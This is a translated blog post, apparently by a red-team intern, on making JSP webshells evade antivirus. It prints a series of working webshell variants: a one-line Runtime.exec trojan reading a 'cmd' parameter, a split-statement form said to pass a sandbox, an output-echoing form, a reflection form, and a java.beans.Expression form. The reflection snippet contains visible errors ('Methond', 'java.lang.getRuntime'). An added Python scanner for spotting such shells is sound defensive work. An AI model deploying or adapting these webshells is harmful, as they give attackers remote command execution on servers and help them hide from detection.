JSP webshell AV evasion: webshell AV evasion
2022-07-02 10:55:00 【Crossing the ridge】
It's funny: during the provincial defense exercise, the people around me mentioned someone every day, said to be a very powerful big shot.
As it turned out, the video I learned AV evasion from was made by that same big shot.
Even more outrageous, Brother Cong said that we have met many times. The last time I sorted out the report for the red team, he was right there.
Sure enough, internships are good: the legendary big shots are all around. Although I didn't recognize him, it still feels good.
Come on, let's start learning AV evasion.
First, what is a webshell?
A webshell is a code execution environment in the form of a web page file such as ASP, PHP, JSP or CGI. It is mainly used for website management, server management, permission management and similar operations. It is easy to use: upload one code file, visit it through the website, and many day-to-day operations can be carried out, which greatly facilitates management of websites and servers.
What is RCE?
RCE stands for remote command/code execute.
It is divided into remote command execution (ping) and remote code execution (eval).
Cause of the vulnerability: input is not processed at the input point.
Start with basic reflection.
The first is the simplest one-line trojan:
<%@ page language="java" pageEncoding="UTF-8" %>
<%
Runtime.getRuntime().exec(request.getParameter("cmd"));
%>
It's too easy to detect.
And while I was writing the code, the computer's virus and threat protection had already started to react.
Now take this one-line trojan and write it as separate statements:
<%@ page language="java" pageEncoding="UTF-8" %>
<%
String cmd =request.getParameter("cmd");
Runtime.getRuntime().exec(cmd);
%>
It passed the sandbox.
However, cmd=ipconfig returns nothing, and neither does netstat -ano.
Change the code again:
<%@ page import="java.io.InputStream" %>
<%@ page import="java.io.InputStreamReader" %>
<%@ page import="java.io.BufferedReader" %>
<%@ page language="java" pageEncoding="UTF-8" %>
<%
String cmd =request.getParameter("cmd");
Process process = Runtime.getRuntime().exec(cmd);
InputStream in = process.getInputStream();
InputStreamReader reader = new InputStreamReader(in);
BufferedReader input = new BufferedReader(reader);
String s = null;
response.getWriter().print("<pre>");
while ((s = input.readLine())!=null){
response.getWriter().println(s);
}
response.getWriter().print("</pre>");
%>
There was an episode along the way:
I couldn't see why the code reported an error. It turned out that getWriter was missing an r (getWrite).
But this only gets the output echoed back; there is no reflection yet:
<%@ page import="java.io.InputStream" %>
<%@ page import="java.io.InputStreamReader" %>
<%@ page import="java.io.BufferedReader" %>
<%@ page import="java.lang.reflect.Method" %>
<%@ page language="java" pageEncoding="UTF-8" %>
<%
String cmd =request.getParameter("cmd");
Class<?> rt = Class.forName("java.lang.getRuntime");
Methond grMethod = rt.getMethod("getRuntime");
Methond method = rt.getMethod("exec",String.class);
Object object = method.invoke(grMethod.invoke(null),cmd);
Process process = (Process)object;
InputStream in = process.getInputStream();
InputStreamReader reader = new InputStreamReader(in);
BufferedReader input = new BufferedReader(reader);
String s = null;
response.getWriter().print("<pre>");
while ((s = input.readLine())!=null){
response.getWriter().println(s);
}
response.getWriter().print("</pre>");
%>
BeansExpression AV evasion
<%@ page import="java.io.InputStream" %>
<%@ page import="java.io.InputStreamReader" %>
<%@ page import="java.io.BufferedReader" %>
<%@ page import="java.beans.Expression" %>
<%@ page language="java" pageEncoding="UTF-8" %>
<%
String cmd =request.getParameter("cmd");
Expression expr = new Expression(Runtime.getRuntime(),"exec",new Object[]{cmd});
Process process = (Process) expr.getValue();
InputStream in = process.getInputStream();
StringBuilder sb = new StringBuilder();
response.getWriter().print("<pre>");
InputStreamReader resultReader = new InputStreamReader(in);
BufferedReader stdInput = new BufferedReader(resultReader);
String s = null;
while ((s = stdInput.readLine())!=null){
sb.append(s).append("\n");
}
response.getWriter().print(sb.toString());
response.getWriter().print("</pre>");
%>
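A defender's view of the variants above, as an added example that is not part of the original post: a first-pass webroot scanner that flags JSP files combining request input with any of the three execution paths shown (direct, reflective, java.beans.Expression). The function names, rule names and sample fragments are constructed for illustration.

```python
import re
from pathlib import Path

# Source: request-controlled input, present in every variant on this page.
SOURCE = re.compile(r'request\s*\.\s*getParameter\s*\(')

# Sinks: the direct call plus the two indirections the post walks through.
SINKS = {
    "runtime-exec": re.compile(r'getRuntime\s*\(\s*\)\s*\.\s*exec\s*\('),
    "reflective-exec": re.compile(r'getMethod\s*\(\s*"exec"'),
    "beans-expression-exec": re.compile(r'new\s+Expression\s*\([^;]*"exec"'),
}

# JSP and Java block comments are ignored so commented-out code is not flagged.
COMMENTS = re.compile(r'<%--.*?--%>|/\*.*?\*/', re.S)


def find_sinks(jsp_text):
    """Return the sorted names of execution sinks found outside comments."""
    code = COMMENTS.sub(" ", jsp_text)
    return sorted(name for name, rx in SINKS.items() if rx.search(code))


def classify(jsp_text):
    """'high' = request input and a sink in one file, 'review' = sink only."""
    sinks = find_sinks(jsp_text)
    if not sinks:
        return "clean", sinks
    code = COMMENTS.sub(" ", jsp_text)
    return ("high" if SOURCE.search(code) else "review"), sinks


def scan_tree(webroot):
    """Classify every *.jsp* file under webroot; clean files are skipped."""
    hits = {}
    for path in Path(webroot).rglob("*.jsp*"):
        verdict, sinks = classify(path.read_text(errors="replace"))
        if verdict != "clean":
            hits[str(path)] = (verdict, sinks)
    return hits


# Constructed samples: abridged fragments of the variants shown above.
SAMPLES = {
    "inline": 'Runtime.getRuntime().exec(request.getParameter("cmd"));',
    "split": 'String cmd =request.getParameter("cmd");\nRuntime.getRuntime().exec(cmd);',
    "reflect": 'String cmd =request.getParameter("cmd");\nrt.getMethod("exec",String.class);',
    "beans": 'String cmd =request.getParameter("cmd");\nnew Expression(Runtime.getRuntime(),"exec",new Object[]{cmd});',
    "benign": '<%= request.getParameter("name") %>',
}
```

Static matching like this is only a first pass over a webroot; child processes spawned by the servlet container remain the stronger signal.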